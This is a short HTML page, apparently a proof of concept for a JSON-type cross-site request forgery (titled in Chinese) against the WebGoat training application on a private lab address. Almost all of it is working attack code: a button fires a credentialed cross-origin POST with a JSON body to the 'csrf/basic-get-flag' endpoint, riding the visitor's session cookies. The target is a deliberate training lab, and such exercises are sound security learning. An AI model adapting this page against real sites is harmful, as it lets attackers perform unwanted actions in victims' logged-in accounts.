<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>测试JSON型CSRF</title>
<script style="text/javascript">
function csrfReq(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.16.133:8080/WebGoat/csrf/basic-get-flag", true);
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.withCredentials = true;
xhr.send(JSON.stringify({"p1":"v1"}));
}</script>
</head>
<body>
<h1>测试POSTJSON型CSRF</h1>
<input type="button" value="提交CSRFJSON" onClick="csrfReq()">
</body>
</html>